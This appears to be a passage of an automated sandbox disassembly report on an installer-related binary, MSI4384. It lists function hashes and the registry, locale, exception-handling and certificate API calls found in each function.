                                                                    • Instruction ID: 0ae64c445b169e540a3ee5b88b340c337c3ad1f95ef319a08523271f14a2ca07
                                                                    • Opcode Fuzzy Hash: ac61388c8897050de777ffe7bea0832b8123a91d572e9f478f7e86d3faa48ab9
                                                                    • Instruction Fuzzy Hash: D151B17290021AABFF209F61DC45FAF7BA9EF40B44F24442EF904E6290DB788D11CB58
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,?,?), ref: 004317A2
                                                                    • RegQueryValueExW.ADVAPI32(?,00000002,00000000,00000000,004847B8,00000800), ref: 004317C2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValue
                                                                    • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                    • API String ID: 4153817207-1914306501
                                                                    • Opcode ID: 4e61c9fa04a3fbeaa64687debbcbdeee7c7174b003b4edc8a1d58f1ecfa1472d
                                                                    • Instruction ID: aa7c2288361252d15ce14e25e789eb4693cf93d196ff78e5fd38af828b558849
                                                                    • Opcode Fuzzy Hash: 4e61c9fa04a3fbeaa64687debbcbdeee7c7174b003b4edc8a1d58f1ecfa1472d
                                                                    • Instruction Fuzzy Hash: 7CD1D365A002528BDB34AF14C8412B772E1EFAD744F5DA46BD8458B3B1E778CC82C39D
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0044D1A0
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0044D2AE
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0044D41B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 1206542248-393685449
                                                                    • Opcode ID: a3efbc2060127269a51c50161eb5b0996f3e4c08aa6ffefadb71f534923578ce
                                                                    • Instruction ID: d3df4639e7f2618872224a054cf9d9dc8aa3de27332e156f889df83b4b88b651
                                                                    • Opcode Fuzzy Hash: a3efbc2060127269a51c50161eb5b0996f3e4c08aa6ffefadb71f534923578ce
                                                                    • Instruction Fuzzy Hash: 4FB15871D00209EFEF15DFA5C8819AEBBB5BF04314F14456BE8016B312D739EA61CB9A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00446A4B
                                                                      • Part of subcall function 00445722: __EH_prolog3_GS.LIBCMT ref: 00445729
                                                                      • Part of subcall function 00445722: __Getcoll.LIBCPMT ref: 0044578D
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • __Getcoll.LIBCPMT ref: 00446A9A
                                                                      • Part of subcall function 0044556A: __EH_prolog3.LIBCMT ref: 00445571
                                                                      • Part of subcall function 0044556A: std::_Lockit::_Lockit.LIBCPMT ref: 0044557B
                                                                      • Part of subcall function 0044556A: std::_Lockit::~_Lockit.LIBCPMT ref: 004455EC
                                                                      • Part of subcall function 004349F5: __EH_prolog3.LIBCMT ref: 004349FC
                                                                      • Part of subcall function 004349F5: std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
                                                                      • Part of subcall function 004349F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
                                                                    • numpunct.LIBCPMT ref: 00446CCA
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localnumpunct
                                                                    • String ID: :H$:H$:H
                                                                    • API String ID: 2516209439-3960432997
                                                                    • Opcode ID: de7470cab8b8aed2534d9881d552f8f036d2cf946e244e8eb7c4c3286db8e2c7
                                                                    • Instruction ID: 540344884dc8c3bef8739b1fbe2dbae888e3ccffa0f74b4587e029ff26ffc1a4
                                                                    • Opcode Fuzzy Hash: de7470cab8b8aed2534d9881d552f8f036d2cf946e244e8eb7c4c3286db8e2c7
                                                                    • Instruction Fuzzy Hash: 03910AB1D006215BEB10AFB68C0267F7AA4DF92365F15851FF845A7282DB7C8D0087AF
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,0000000C,F3E52339,00000000,?,00000000,?,?,?,?,00000000,0046CFB1,000000FF,?,0042EB5A,00000000), ref: 0042FB04
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042FB3A
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042FB9E
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042FC5E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042FD12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 2968629171-1405518554
                                                                    • Opcode ID: 84dedd6f9325feaaf40b83bf44bb76ca33279ca6ccfc9bf83aeac24240aee741
                                                                    • Instruction ID: 84de8b09e16972e76c570ee25c4e4f727722752d18573c1b24da527c4f0ed51d
                                                                    • Opcode Fuzzy Hash: 84dedd6f9325feaaf40b83bf44bb76ca33279ca6ccfc9bf83aeac24240aee741
                                                                    • Instruction Fuzzy Hash: 427191B0D01359DAEF10CFA9D9447CEBFB4BF14308F54816AE414AB381E7B99A08CB95
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000008,F3E52339,00000000,?,00000000,?,?,?,?,0046CEBD,000000FF,?,0042EC9A,?,?), ref: 0042F8D4
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F90A
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042F96E
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042F9DE
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042FA92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 2968629171-1405518554
                                                                    • Opcode ID: 1b39d43e2933bb4f884615cb095d8c87c10b28c52ab20704f43e05d41e87f515
                                                                    • Instruction ID: 944e2f27d68cd45d0f83f2088949cc0526b3a72e42c06823761a27a90b563718
                                                                    • Opcode Fuzzy Hash: 1b39d43e2933bb4f884615cb095d8c87c10b28c52ab20704f43e05d41e87f515
                                                                    • Instruction Fuzzy Hash: 5461B2B0E01349EAEF10CFA9D5447CEBFB4AF14308F54856ED454AB381E7B99A08CB55
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0044AD67
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0044AD6F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0044ADF8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0044AE23
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0044AE78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 058b2866f78a4e32c479e0d9dd11c875d999aa42d08022092b670177965edcfd
                                                                    • Instruction ID: 0e9671351f93cc96e0a602dfc37107c54e8f6cd2469f74bd131215dec45a29a6
                                                                    • Opcode Fuzzy Hash: 058b2866f78a4e32c479e0d9dd11c875d999aa42d08022092b670177965edcfd
                                                                    • Instruction Fuzzy Hash: 19411974E402089BDF10DF69C884A9FBBB5FF45318F24805BE8155B392D739D921CB9A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004451F3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004451FD
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • messages.LIBCPMT ref: 00445237
                                                                    • std::_Facet_Register.LIBCPMT ref: 0044524E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0044526E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID: :H
                                                                    • API String ID: 2750803064-3114238791
                                                                    • Opcode ID: d8542993b2a54e4e2e265cbc4cf1e86cda36a46dbb0f0aebe12842f5b9a1f0a0
                                                                    • Instruction ID: b3f3924e193657e54bffc2df0078187b3405a340d9ac172e14fb96f7a394afb7
                                                                    • Opcode Fuzzy Hash: d8542993b2a54e4e2e265cbc4cf1e86cda36a46dbb0f0aebe12842f5b9a1f0a0
                                                                    • Instruction Fuzzy Hash: D4010431900515EBDF04FFA5D8516AE7761BF44718F24441FE410AB392DF789E018B99
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043ABCB
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043ABD5
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043AC0F
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AC26
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AC46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID: |:H
                                                                    • API String ID: 419941038-4278476797
                                                                    • Opcode ID: 37f8d1c1e22f5e09ce04b13579dc4fe36d4a25d8aa49e04213797bb081e143e0
                                                                    • Instruction ID: 059dcb1e9626028d8d29413bea33130447951fb3be63da3bb3c52f2fab808eb8
                                                                    • Opcode Fuzzy Hash: 37f8d1c1e22f5e09ce04b13579dc4fe36d4a25d8aa49e04213797bb081e143e0
                                                                    • Instruction Fuzzy Hash: 37010031A001299BCB09EFA5D8916AE7760BF88718F24541EE451AB381DF789E048B8E
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AC60
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AC6A
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043ACA4
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043ACBB
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043ACDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID: X:H
                                                                    • API String ID: 419941038-3225465281
                                                                    • Opcode ID: 915bfaf567af9f8be4759e80e0146578b6263da929cca9730fdbb80c4be5cd20
                                                                    • Instruction ID: 65404657a34e0e39884d3255b9e355097d7ee0e1d318657bb5a9d9be23172623
                                                                    • Opcode Fuzzy Hash: 915bfaf567af9f8be4759e80e0146578b6263da929cca9730fdbb80c4be5cd20
                                                                    • Instruction Fuzzy Hash: 7A010031A001259BCB09EFA5D855AAE7760BF88B19F25141EF410AB3D1DF788A018B8A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043ACF5
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043ACFF
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043AD39
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AD50
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AD70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID: T:H
                                                                    • API String ID: 419941038-3378137253
                                                                    • Opcode ID: 8869110cdcfdc49ada707fcc179d8fc01a212d4f0c2eaf9dfe87bad1d9411436
                                                                    • Instruction ID: 814062be13c1ba9c7acbbe621dff30f314f1e9026378742bf13207a26966a6cd
                                                                    • Opcode Fuzzy Hash: 8869110cdcfdc49ada707fcc179d8fc01a212d4f0c2eaf9dfe87bad1d9411436
                                                                    • Instruction Fuzzy Hash: E60100319401259BCB08FFA5D841AAE7761BF88719F64051EE452AB391DF7C8E048B8A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AF49
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AF53
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • numpunct.LIBCPMT ref: 0043AF8D
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AFA4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AFC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID: h:H
                                                                    • API String ID: 743221004-3828044881
                                                                    • Opcode ID: eb1c364e11cf809666610863fba97a39b5f41b8a0517e22856dddbae7e33b8a0
                                                                    • Instruction ID: 36924511c47a401f31c2ac3885715e98550525acfd46525a5b233acb2d0b703f
                                                                    • Opcode Fuzzy Hash: eb1c364e11cf809666610863fba97a39b5f41b8a0517e22856dddbae7e33b8a0
                                                                    • Instruction Fuzzy Hash: EF0104719001199BCB04FFA5D851AAE7764AF48718F21441FF410A7391DF7C8A048BCE
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3767a7d6d0192a2467eac590044d3ed76be4238a063b5c23c08e24abd260c763
                                                                    • Instruction ID: dabc00ba0ec7682ef2318b3014e6788cf4221f9d092716fb8490b24fb02806ee
                                                                    • Opcode Fuzzy Hash: 3767a7d6d0192a2467eac590044d3ed76be4238a063b5c23c08e24abd260c763
                                                                    • Instruction Fuzzy Hash: 70B16871D00355AFDB21DF24C881BEEBBA5EF19305F14416BEC14AB383D278A905CBA9
                                                                    APIs
                                                                    • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00422D50
                                                                    • LocalFree.KERNEL32(?), ref: 00422DBA
                                                                    • LocalFree.KERNEL32(?), ref: 00422E24
                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00422F65
                                                                      • Part of subcall function 00423DC0: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000,F3E52339), ref: 00423E03
                                                                    • LocalFree.KERNEL32(?), ref: 00422F1B
                                                                    • CertFreeCertificateContext.CRYPT32(00000003,?), ref: 00422FAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Free$CertLocal$CertificateContext$#224NameString
                                                                    • String ID:
                                                                    • API String ID: 2751787804-0
                                                                    • Opcode ID: 6237d820bfa86cdf7a6fd4bb7f34f5858d98ba2037ec3d1adf7f1d5699dbffc6
                                                                    • Instruction ID: f985ae622feb80876e55a081d8fec6fe9136f88c09d3d33a1c36d379f907f807
                                                                    • Opcode Fuzzy Hash: 6237d820bfa86cdf7a6fd4bb7f34f5858d98ba2037ec3d1adf7f1d5699dbffc6
                                                                    • Instruction Fuzzy Hash: 3391C070E00259DFDB18CFA8D65879EBBB1FF44304F10461ED415AB391DBB8AA84CB94
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042B8DD
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    • LocalFree.KERNEL32 ref: 0042B9B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                    • String ID:
                                                                    • API String ID: 1378673503-0
                                                                    • Opcode ID: 3f4a7c087ebb1c10028f0d85ed490b1b2e7557e3edc644985a365a9c3a89b66a
                                                                    • Instruction ID: 001b51c90f6ee6af57e811fc135ab439bdaa64e07a730ed2617ac2b19bca78c7
                                                                    • Opcode Fuzzy Hash: 3f4a7c087ebb1c10028f0d85ed490b1b2e7557e3edc644985a365a9c3a89b66a
                                                                    • Instruction Fuzzy Hash: 1151E5B1901619DFDB10DF58E8407AEFBB4FB04724F14866EE864A7391D778AA00CBC9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3509577899-3206640213
                                                                    • Opcode ID: 276c0fee8de7088265c8b09affb669beaf2516d9f372a1106c384f339e55b26b
                                                                    • Instruction ID: e5dd91ba740a7fbf77a21837fcd9218ba2f7d489cd4439ce345dac02cf228e5a
                                                                    • Opcode Fuzzy Hash: 276c0fee8de7088265c8b09affb669beaf2516d9f372a1106c384f339e55b26b
                                                                    • Instruction Fuzzy Hash: FFC1E671904201CADB249F699845ABB77B0FF45702F26406FEE01AB393DA3D8D4ECB59
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0044CD41,0044AC5C,0044A3E4), ref: 0044CD58
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044CD66
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044CD7F
                                                                    • SetLastError.KERNEL32(00000000,0044CD41,0044AC5C,0044A3E4), ref: 0044CDD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 57d8cd83821044895310ff96d7b9366a17de62e8823e54e00e5329a9c4f0dfa7
                                                                    • Instruction ID: 7d71966c19c127f51efed73bfe9bdaa0a9b1c71b651ba415f1ee00ae24da0a29
                                                                    • Opcode Fuzzy Hash: 57d8cd83821044895310ff96d7b9366a17de62e8823e54e00e5329a9c4f0dfa7
                                                                    • Instruction Fuzzy Hash: 000124B390F2125EB76026B5BCC566B2E86EB02378734023FF210422F1EF991C05D66C
                                                                    APIs
                                                                    Strings
